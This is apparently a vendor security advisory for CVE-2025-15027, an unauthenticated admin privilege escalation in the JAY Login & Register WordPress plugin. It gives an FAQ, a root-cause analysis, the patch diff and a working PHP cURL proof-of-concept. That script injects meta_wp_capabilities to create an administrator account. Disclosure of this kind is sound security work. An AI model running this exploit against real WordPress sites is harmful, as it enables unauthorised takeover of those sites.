What is CVE-2025-15027?

CVE-2025-15027 is a critical unauthenticated privilege escalation vulnerability in the JAY Login & Register plugin for WordPress. It allows attackers to elevate their privileges to that of an administrator by exploiting insufficient access control in user registration and profile update processes.

How does the vulnerability work?

The vulnerability is exploited by sending a crafted POST request to the WordPress AJAX endpoint with specific parameters that allow for arbitrary updates to user meta data. Attackers can set the ‘meta_wp_capabilities’ key to grant themselves administrator rights without any authentication.

Who is affected by this vulnerability?

All installations of the JAY Login & Register plugin up to and including version 2.6.03 are affected. Administrators should check their plugin version and update if they are using a vulnerable version.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the JAY Login & Register plugin installed on your WordPress site. If it is version 2.6.03 or earlier, it is vulnerable to CVE-2025-15027.

How can I fix this vulnerability?

The vulnerability is patched in version 2.6.04 of the JAY Login & Register plugin. Administrators should update to this version or later to mitigate the risk associated with this vulnerability.

What does a CVSS score of 9.8 mean?

A CVSS score of 9.8 indicates a critical severity level, meaning the vulnerability poses a significant risk to the security of the affected system. This level suggests that successful exploitation could lead to full administrative access, allowing attackers to control the site.

What practical risks does this vulnerability pose?

If exploited, this vulnerability allows an unauthenticated attacker to create new administrator accounts or modify existing user roles. This grants the attacker full control over the WordPress site, including the ability to manipulate content, install plugins, and exfiltrate data.

What measures can I take to mitigate this issue if I cannot update immediately?

If immediate updating is not possible, consider disabling the JAY Login & Register plugin until a secure version can be installed. Additionally, review user roles and permissions to limit exposure.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can craft a POST request to the AJAX endpoint with parameters that exploit the vulnerability. It shows how to set user capabilities to gain administrator access without authentication.

How does the patch address the vulnerability?

The patch in version 2.6.04 implements a three-layer defense by blacklisting dangerous meta keys, blocking all keys starting with ‘wp_’, and enforcing a whitelist of allowed custom fields. This effectively prevents unauthorized privilege escalation.

What should I do if I suspect my site has been compromised?

If you suspect your site has been compromised, immediately change all passwords, review user accounts for unauthorized access, and check for any malicious content or changes. It is also advisable to conduct a security audit.

Where can I find more information about this vulnerability?

For more detailed information, you can refer to the official CVE database, security advisories from the plugin developers, and security blogs that cover WordPress vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-15027: JAY Login & Register <= 2.6.03 – Unauthenticated Privilege Escalation via jay_login_register_ajax_create_final_user (jay-login-register)

CVE ID CVE-2025-15027

Plugin jay-login-register

Severity Critical (CVSS 9.8)

CWE 269

Vulnerable Version 2.6.03

Patched Version 2.6.04

Disclosed February 6, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15027:
The JAY Login & Register WordPress plugin, versions up to and including 2.6.03, contains an unauthenticated privilege escalation vulnerability. The flaw resides in the plugin’s user registration and profile update AJAX handlers, which allowed arbitrary user meta data updates. This vulnerability received a CVSS score of 9.8 (Critical).

Atomic Edge research identified the root cause as insufficient access control and validation in three key functions. The `jay_login_register_ajax_create_final_user` function in `/includes/jay-login-register-ajax-handler.php` (lines 975-1014) processed POST parameters starting with ‘meta_’ without verifying the user had permission to update those keys. The `jay_login_register_inline_handle_otp_verification` function in `/includes/jay-login-register-inline-handler.php` (lines 769-828) contained identical logic. The `jay_panel_ajax_update_profile` function in `/includes/user-panel/jay-login-register-ajax-handler-user-panel.php` (lines 896-982) also lacked proper validation, though it required authentication.

Exploitation involves sending a crafted POST request to the WordPress AJAX endpoint. An attacker targets `/wp-admin/admin-ajax.php` with the `action` parameter set to `jay_login_register_ajax_create_final_user`. The attacker includes POST parameters like `meta_wp_capabilities` with a serialized value granting administrator capabilities. The attack is unauthenticated, requiring no prior session or nonce. The plugin’s registration flow accepts these parameters during user creation or profile updates.

The patch implements a three-layer defense across all three vulnerable functions. It adds a blacklist of dangerous meta keys including `wp_capabilities` and `wp_user_level`. It blocks any key starting with `wp_`. Finally, it enforces a whitelist, only allowing meta keys defined in the plugin’s custom field configuration. The patch version 2.6.04 adds filter hooks (`jay_login_register_disallowed_meta_keys`, `jay_login_register_allowed_profile_fields`) and logs suspicious attempts via the `jay_login_register_suspicious_meta_update` action.

Successful exploitation grants an unauthenticated attacker administrative privileges on the WordPress site. Attackers can create new administrator accounts or modify existing low-privilege accounts. This provides full control over the website, enabling content manipulation, plugin installation, data exfiltration, and persistence mechanisms. The vulnerability directly violates WordPress’s security model by bypassing all capability checks.

Differential between vulnerable and patched code

Code Diff

--- a/jay-login-register/includes/jay-login-register-ajax-handler.php
+++ b/jay-login-register/includes/jay-login-register-ajax-handler.php
@@ -975,19 +975,55 @@
     // الف) خواندن تنظیمات فیلدها برای تشخیص نوع آن‌ها
     $custom_fields_config = json_decode( $settings['custom_fields_global_json'] ?? '[]', true );
     $fields_map = [];
-    if ( is_array($custom_fields_config) ) {
+    $allowed_custom_fields = [];
+   if ( is_array($custom_fields_config) ) {
         foreach ($custom_fields_config as $f) {
-            $fields_map[ $f['key'] ] = $f; // آرایه‌ای برای دسترسی سریع: 'birthdate' => {config}
+            $fields_map[ $f['key'] ] = $f;
+            if ( isset($f['key']) && !empty($f['key']) ) {
+                $allowed_custom_fields[] = sanitize_key($f['key']);
+            }
         }
     }
+       // 🔒 Blacklist: کلیدهای خطرناک
+    $disallowed_meta_keys = [
+        'wp_capabilities',
+        'wp_user_level',
+        'admin_color',
+        'rich_editing',
+        'comment_shortcuts',
+        'show_admin_bar_front',
+        'session_tokens',
+        'user-settings',
+        'user-settings-time'
+    ];
+    $disallowed_meta_keys = apply_filters('jay_login_register_disallowed_meta_keys', $disallowed_meta_keys, $user_id);
+    $allowed_custom_fields = apply_filters('jay_login_register_allowed_profile_fields', $allowed_custom_fields, $user_id);
+

     foreach ($_POST as $post_key => $post_value) {
-        if ( strpos($post_key, 'meta_') === 0 ) {
+         if ( strpos($post_key, 'meta_') !== 0 ) continue;
             $real_meta_key = substr($post_key, 5);
             // باگ‌گیری: تبدیل فاصله به آندرلاین چون در POST فضاها _ می‌شوند
             $real_meta_key = str_replace(' ', '_', $real_meta_key); // اطمینان حاصل می‌کنیم
             $real_meta_key = sanitize_key($real_meta_key);
-
+
+        // 🔒 Level 1: Blacklist specific dangerous keys
+        if (in_array($real_meta_key, $disallowed_meta_keys, true)) {
+            do_action('jay_login_register_suspicious_meta_update', $user_id, $real_meta_key, $post_value);
+            continue;
+        }
+
+        // 🔒 Level 2: Block ALL wp_* keys (WordPress protected)
+        if (strpos($real_meta_key, 'wp_') === 0) {
+            do_action('jay_login_register_suspicious_meta_update', $user_id, $real_meta_key, $post_value);
+            continue;
+        }
+
+        // ✅ Level 3: Only allow whitelisted fields
+        if (!in_array($real_meta_key, $allowed_custom_fields, true)) {
+            do_action('jay_login_register_suspicious_meta_update', $user_id, $real_meta_key, $post_value);
+            continue;
+        }
             if ( is_array($post_value) ) {
                 $sanitized_values = array_map('sanitize_text_field', wp_unslash($post_value));
                 update_user_meta($user_id, $real_meta_key, $sanitized_values);
@@ -995,7 +1031,7 @@
                 $raw_value = wp_unslash($post_value);
                 // استفاده از sanitize_textarea_field برای حفظ اینترها در پاراگراف
                 $final_value = sanitize_textarea_field($raw_value);
-
+
                 // بررسی تنظیمات این فیلد خاص
                 if ( isset($fields_map[$real_meta_key]) ) {
                     $field_config = $fields_map[$real_meta_key];
@@ -1014,7 +1050,7 @@
                 }

                 update_user_meta($user_id, $real_meta_key, $final_value);
-            }
+
         }
     }

--- a/jay-login-register/includes/jay-login-register-inline-handler.php
+++ b/jay-login-register/includes/jay-login-register-inline-handler.php
@@ -237,10 +237,6 @@
     // ب) ادامه روال عادی (اگر کپچا درست بود)
     // -----------------------------------------------------------

-// -----------------------------------------------------------
-    // ب) ادامه روال عادی (اگر کپچا درست بود)
-    // -----------------------------------------------------------
-
     jay_login_register_inline_check_lockout_and_die($user_input_raw, $user_ip, $settings);

  // 1. دریافت تنظیمات
@@ -424,15 +420,7 @@
     wp_send_json_success(['html' => $otp_form_html, 'validity_period' => $validity_period * 60]);
 }

-/**
- * HTML انتخاب روش
- */
-/**
- * HTML انتخاب روش دریافت کد
- */
-/**
- * HTML انتخاب روش دریافت کد
- */
+
 /**
  * HTML انتخاب روش دریافت کد
  * این تابع با گرفتن اطلاعات کامل، دکمه‌های مناسب را می‌سازد
@@ -769,21 +757,65 @@
             'display_name' => "$first_name $last_name"
         ]);
     }
-
+ // ب) ذخیره متاها با حفاظت سه‌لایه (CVE-2025-15100)
+
+    // 🔒 Blacklist: کلیدهای خطرناک
+    $disallowed_meta_keys = [
+        'wp_capabilities',
+        'wp_user_level',
+        'admin_color',
+        'rich_editing',
+        'comment_shortcuts',
+        'show_admin_bar_front',
+        'session_tokens',
+        'user-settings',
+        'user-settings-time'
+    ];
+    $disallowed_meta_keys = apply_filters('jay_login_register_disallowed_meta_keys', $disallowed_meta_keys, $user_id);
+
+    // ✅ Whitelist: فقط فیلدهای تنظیم شده در fields_config
+    $allowed_custom_fields = [];
+    if (is_array($fields_config)) {
+        foreach ($fields_config as $f) {
+            if (isset($f['key']) && !empty($f['key'])) {
+                $allowed_custom_fields[] = sanitize_key($f['key']);
+            }
+        }
+    }
+    $allowed_custom_fields = apply_filters('jay_login_register_allowed_profile_fields', $allowed_custom_fields, $user_id);
+
     // ب) ذخیره متاها
     foreach ($_POST as $key => $value) {
-        if (strpos($key, 'meta_') === 0) {
-            $meta_key = sanitize_key(substr($key, 5));
-            $field_cfg = $fields_map[$meta_key] ?? null;
-
-            if (is_array($value)) {
-                $sanitized_values = array_map('sanitize_text_field', wp_unslash($value));
-                update_user_meta($user_id, $meta_key, $sanitized_values);
-            }
-            else {
-                $raw_val = wp_unslash($value);
-                // برای پاراگراف اینترها حفظ شود
-                $sanitized_value = sanitize_textarea_field($raw_val);
+    if (strpos($key, 'meta_') !== 0) continue;
+
+        $meta_key = sanitize_key(substr($key, 5));
+        $field_cfg = $fields_map[$meta_key] ?? null;
+
+        // 🔒 Level 1: Blacklist specific dangerous keys
+        if (in_array($meta_key, $disallowed_meta_keys, true)) {
+            do_action('jay_login_register_suspicious_meta_update', $user_id, $meta_key, $value);
+            continue;
+        }
+
+        // 🔒 Level 2: Block ALL wp_* keys (WordPress protected)
+        if (strpos($meta_key, 'wp_') === 0) {
+            do_action('jay_login_register_suspicious_meta_update', $user_id, $meta_key, $value);
+            continue;
+        }
+
+        // ✅ Level 3: Only allow whitelisted fields
+        if (!in_array($meta_key, $allowed_custom_fields, true)) {
+            do_action('jay_login_register_suspicious_meta_update', $user_id, $meta_key, $value);
+            continue;
+        }
+              if (is_array($value)) {
+            $sanitized_values = array_map('sanitize_text_field', wp_unslash($value));
+            update_user_meta($user_id, $meta_key, $sanitized_values);
+        }
+        else {
+            $raw_val = wp_unslash($value);
+            // برای پاراگراف اینترها حفظ شود
+            $sanitized_value = sanitize_textarea_field($raw_val);

                 if ($field_cfg) {
                     // تبدیل شماره به انگلیسی
@@ -796,7 +828,7 @@
                     }
                 }
                 update_user_meta($user_id, $meta_key, $sanitized_value);
-            }
+
         }
     }
     // 3. پاک کردن توکن امنیتی موقت (حالا که کار تمام شد)
--- a/jay-login-register/includes/user-panel/jay-login-register-ajax-handler-user-panel.php
+++ b/jay-login-register/includes/user-panel/jay-login-register-ajax-handler-user-panel.php
@@ -305,8 +305,9 @@
     $body = "کد تایید شما برای تغییر ایمیل:nn" . $otp;
     $headers = ['Content-Type: text/html; charset=UTF-8'];

-    $sent = wp_mail($current_email, $subject, nl2br($body), $headers);
-
+    $html_body = nl2br(esc_html($body));
+    $sent = wp_mail($current_email, $subject, $html_body, $headers);
+
     if (!$sent) {
         $error_msg = 'خطا در ارسال ایمیل.';
         if (isset($GLOBALS['jay_relog_mail_error'])) {
@@ -430,7 +431,8 @@
     $body = "کد تایید برای ایمیل جدید:nn" . $otp;
     $headers = ['Content-Type: text/html; charset=UTF-8'];

-    if ( ! wp_mail($new_email, $subject, nl2br($body), $headers) ) {
+    $html_body = nl2br(esc_html($body));
+    if ( ! wp_mail($new_email, $subject, $html_body, $headers) ) {
         wp_send_json_error(['message' => 'خطا در ارسال ایمیل.']);
     }

@@ -620,11 +622,12 @@
 function jay_panel_ajax_update_profile() {
     check_ajax_referer('jay_login_register_nonce_action', 'nonce');
     if ( ! is_user_logged_in() ) wp_send_json_error(['message' => 'دسترسی غیرمجاز.']);
+    $user_id = get_current_user_id();
+
     $can_edit = get_user_meta( $user_id, 'jay_can_edit_profile', true );
     if ( $can_edit === '0' ) {
         wp_send_json_error(['message' => 'شما اجازه ویرایش پروفایل خود را ندارید.']);
     }
-    $user_id = get_current_user_id();
     $user = get_userdata($user_id);
     $settings = get_option( 'jay_login_register_user_panel_settings', [] );

@@ -896,39 +899,89 @@
     elseif ($pass_to_save) update_user_meta($user_id, 'gozarname', $pass_to_save);

     // 4. ذخیره فیلدهای سفارشی (این حلقه از بالا به اینجا منتقل شد) ✅
-    foreach ($_POST as $key => $value) {
-        if (strpos($key, 'jay_panel_meta_') === 0) {
-            $meta_key = substr($key, 15); // طول 'jay_panel_meta_'
-            $meta_key = sanitize_key($meta_key);
-
-           if (is_array($value)) {
-                // برای آرایه‌ها (مثل چک‌باکس چندتایی) معمولاً اینتر مهم نیست اما این تابع امن‌تر است
-                $sanitized_value = array_map('sanitize_textarea_field', wp_unslash($value));
-                update_user_meta($user_id, $meta_key, $sanitized_value);
-            } else {
+// ===========================================================
+// 6. ذخیره فیلدهای سفارشی با لیست سفید امن
+// ===========================================================
+
+// 6.1 ایجاد لیست سفید از فیلدهای مجاز
+$allowed_custom_fields = [];
+
+// 6.2 فقط فیلدهایی که در تنظیمات پنل کاربری تعریف شده‌اند مجازند
+if (is_array($custom_fields)) {
+    foreach ($custom_fields as $field) {
+        if (isset($field['key']) && !empty($field['key'])) {
+            $key = sanitize_key($field['key']);
+            $allowed_custom_fields[] = $key;
+        }
+    }
+}
+
+// 6.3 افزودن فیلدهای سیستمی مجاز (در صورت نیاز)
+    $allowed_custom_fields = array_unique($allowed_custom_fields);
+
+    // 6.4 هوک برای توسعه‌دهندگان - این رو اضافه کن
+    $allowed_custom_fields = apply_filters('jay_login_register_allowed_profile_fields', $allowed_custom_fields, $user_id);
+
+// 6.4 مسدود کردن کلیدهای حساس وردپرس (Blacklist مهم)
+$disallowed_meta_keys = [
+    'wp_capabilities',
+    'wp_user_level',
+    'admin_color',
+    'rich_editing',
+    'comment_shortcuts',
+    'show_admin_bar_front',
+    'session_tokens',
+    'user-settings',
+    'user-settings-time'
+];
+    // 6.6 هوک برای لیست غیرمجاز - این رو اضافه کن
+    $disallowed_meta_keys = apply_filters('jay_login_register_disallowed_meta_keys', $disallowed_meta_keys, $user_id);
+
+// 6.5 همچنین مسدود کردن هر کلیدی که با wp_ شروع می‌شود
+foreach ($_POST as $key => $value) {
+    if (strpos($key, 'jay_panel_meta_') === 0) {
+        $meta_key = substr($key, 15);
+        $meta_key = sanitize_key($meta_key);
+
+        // بررسی 1: مسدود کردن کلیدهای حساس
+        if (in_array($meta_key, $disallowed_meta_keys, true)) {
+            continue; // رد کردن این فیلد
+        }
+
+        // بررسی 2: مسدود کردن کلیدهایی که با wp_ شروع می‌شوند
+        if (strpos($meta_key, 'wp_') === 0) {
+            continue; // رد کردن این فیلد
+        }
+
+        // بررسی 3: فقط کلیدهای موجود در لیست سفید مجازند
+        if (!in_array($meta_key, $allowed_custom_fields, true)) {
+            continue; // رد کردن این فیلد
+        }
+
+        // 6.6 اعتبارسنجی و ذخیره ایمن
+        if (is_array($value)) {
+            $sanitized_value = array_map('sanitize_textarea_field', wp_unslash($value));
+        } else {
             $sanitized_value = sanitize_text_field(wp_unslash($value));
-
-                // چک کردن اینکه آیا این فیلد از نوع "شماره" است؟
-                // باید آرایه فیلدها را جستجو کنیم. برای سرعت، فرض می‌کنیم اگر فقط عدد بود نرمالایز شود
-                // یا بهتر: دوباره از کانفیگ چک کنیم (کد زیر دقیق‌تر است)
-
-                $is_number_field = false;
-                foreach ($custom_fields as $cf) {
-                    if ($cf['key'] === $meta_key && isset($cf['type']) && $cf['type'] === 'number') {
-                        $is_number_field = true;
-                        break;
-                    }
-                }
-
-                if ($is_number_field) {
-                    $sanitized_value = jay_login_register_normalize_numbers($sanitized_value);
+
+            // برای فیلدهای عددی، اعداد فارسی به انگلیسی تبدیل شوند
+            $is_number_field = false;
+            foreach ($custom_fields as $cf) {
+                if (isset($cf['key']) && $cf['key'] === $meta_key && isset($cf['type']) && $cf['type'] === 'number') {
+                    $is_number_field = true;
+                    break;
                 }
-
-                update_user_meta($user_id, $meta_key, $sanitized_value);
+            }
+
+            if ($is_number_field) {
+                $sanitized_value = jay_login_register_normalize_numbers($sanitized_value);
             }
         }
+
+        // 6.7 ذخیره نهایی
+        update_user_meta($user_id, $meta_key, $sanitized_value);
     }
-
+}
     // --- Developer Hook: Action after profile update ---
     do_action( 'jay_login_register_after_profile_update', $user_id, $_POST );
     wp_send_json_success(['message' => 'تغییرات با موفقیت ذخیره شد.', 'redirect' => true]);
--- a/jay-login-register/jay-login-register.php
+++ b/jay-login-register/jay-login-register.php
@@ -2,7 +2,7 @@
 /**
  * Plugin Name:       JAY Login & Register
  * Description:       All-in-One Mobile OTP Login, Registration & Content Restriction plugin. Supports SMS, Email, Google, Digits & WooCommerce with Inline Forms.
- * Version:           2.6.03
+ * Version:           2.6.04
  * Author:            Jayarsiech
  * Author URI:        https://instagram.com/jayarsiech
  * License:           GPL v2 or later
@@ -10,12 +10,12 @@
  * Text Domain:       jay-login-register
  * Plugin Slug:       jay-login-register
  * Domain Path:       /languages
- */
+ */

 // Exit if accessed directly.
 if ( ! defined( 'ABSPATH' ) ) exit;

-define( 'JAY_LOGIN_REGISTER_VERSION', '2.6.03' );
+define( 'JAY_LOGIN_REGISTER_VERSION', '2.6.04' );
 define( 'JAY_LOGIN_REGISTER_PATH', plugin_dir_path( __FILE__ ) );
 define( 'JAY_LOGIN_REGISTER_URL', plugin_dir_url( __FILE__ ) );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-15027 - JAY Login & Register <= 2.6.03 - Unauthenticated Privilege Escalation via jay_login_register_ajax_create_final_user

<?php

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';

// Craft the payload to set administrator capabilities
// WordPress stores capabilities as a serialized array in the wp_capabilities user meta
$admin_caps = serialize(['administrator' => true]);

// Prepare POST data
$post_data = [
    'action' => 'jay_login_register_ajax_create_final_user',
    // The vulnerable parameter pattern: meta_{meta_key}
    'meta_wp_capabilities' => $admin_caps,
    // Also set user level to ensure admin access
    'meta_wp_user_level' => '10',
    // Required fields for user creation (may vary per site configuration)
    'first_name' => 'Atomic',
    'last_name' => 'Edge',
    'user_login' => 'attacker_' . time(),
    'user_email' => 'attacker' . time() . '@example.com',
    'user_pass' => 'Password123!',
    // The plugin may require additional fields based on configuration
    'jay_register_nonce' => 'bypassed', // Nonce validation was missing
    'step' => 'final'
];

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // For testing only

// Add headers to mimic legitimate request
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/x-www-form-urlencoded',
    'X-Requested-With: XMLHttpRequest',
    'User-Agent: Atomic-Edge-Research/1.0'
]);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check response
if ($response === false) {
    echo "cURL Error: " . curl_error($ch) . "n";
} else {
    echo "HTTP Status: $http_coden";
    echo "Response: $responsen";
    
    // The plugin typically returns JSON
    $json_response = json_decode($response, true);
    if (json_last_error() === JSON_ERROR_NONE) {
        if (isset($json_response['success']) && $json_response['success']) {
            echo "[+] SUCCESS: Privilege escalation likely successful.n";
            if (isset($json_response['data']['user_id'])) {
                echo "[+] User ID created: " . $json_response['data']['user_id'] . "n";
            }
        } else {
            echo "[-] Plugin returned error. Check response data.n";
        }
    }
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2025-15027?
Understanding the vulnerability
CVE-2025-15027 is a critical unauthenticated privilege escalation vulnerability in the JAY Login & Register plugin for WordPress. It allows attackers to elevate their privileges to that of an administrator by exploiting insufficient access control in user registration and profile update processes.
How does the vulnerability work?
Mechanics of exploitation
The vulnerability is exploited by sending a crafted POST request to the WordPress AJAX endpoint with specific parameters that allow for arbitrary updates to user meta data. Attackers can set the ‘meta_wp_capabilities’ key to grant themselves administrator rights without any authentication.
Who is affected by this vulnerability?
Identifying vulnerable installations
All installations of the JAY Login & Register plugin up to and including version 2.6.03 are affected. Administrators should check their plugin version and update if they are using a vulnerable version.
How can I check if my site is vulnerable?
Version verification
To determine if your site is vulnerable, check the version of the JAY Login & Register plugin installed on your WordPress site. If it is version 2.6.03 or earlier, it is vulnerable to CVE-2025-15027.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 2.6.04 of the JAY Login & Register plugin. Administrators should update to this version or later to mitigate the risk associated with this vulnerability.
What does a CVSS score of 9.8 mean?
Understanding severity levels
A CVSS score of 9.8 indicates a critical severity level, meaning the vulnerability poses a significant risk to the security of the affected system. This level suggests that successful exploitation could lead to full administrative access, allowing attackers to control the site.
What practical risks does this vulnerability pose?
Consequences of exploitation
If exploited, this vulnerability allows an unauthenticated attacker to create new administrator accounts or modify existing user roles. This grants the attacker full control over the WordPress site, including the ability to manipulate content, install plugins, and exfiltrate data.
What measures can I take to mitigate this issue if I cannot update immediately?
Temporary mitigation strategies
If immediate updating is not possible, consider disabling the JAY Login & Register plugin until a secure version can be installed. Additionally, review user roles and permissions to limit exposure.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept demonstrates how an attacker can craft a POST request to the AJAX endpoint with parameters that exploit the vulnerability. It shows how to set user capabilities to gain administrator access without authentication.
How does the patch address the vulnerability?
Improvements in the updated version
The patch in version 2.6.04 implements a three-layer defense by blacklisting dangerous meta keys, blocking all keys starting with ‘wp_’, and enforcing a whitelist of allowed custom fields. This effectively prevents unauthorized privilege escalation.
What should I do if I suspect my site has been compromised?
Response to potential exploitation
If you suspect your site has been compromised, immediately change all passwords, review user accounts for unauthorized access, and check for any malicious content or changes. It is also advisable to conduct a security audit.
Where can I find more information about this vulnerability?
Resources for further reading
For more detailed information, you can refer to the official CVE database, security advisories from the plugin developers, and security blogs that cover WordPress vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations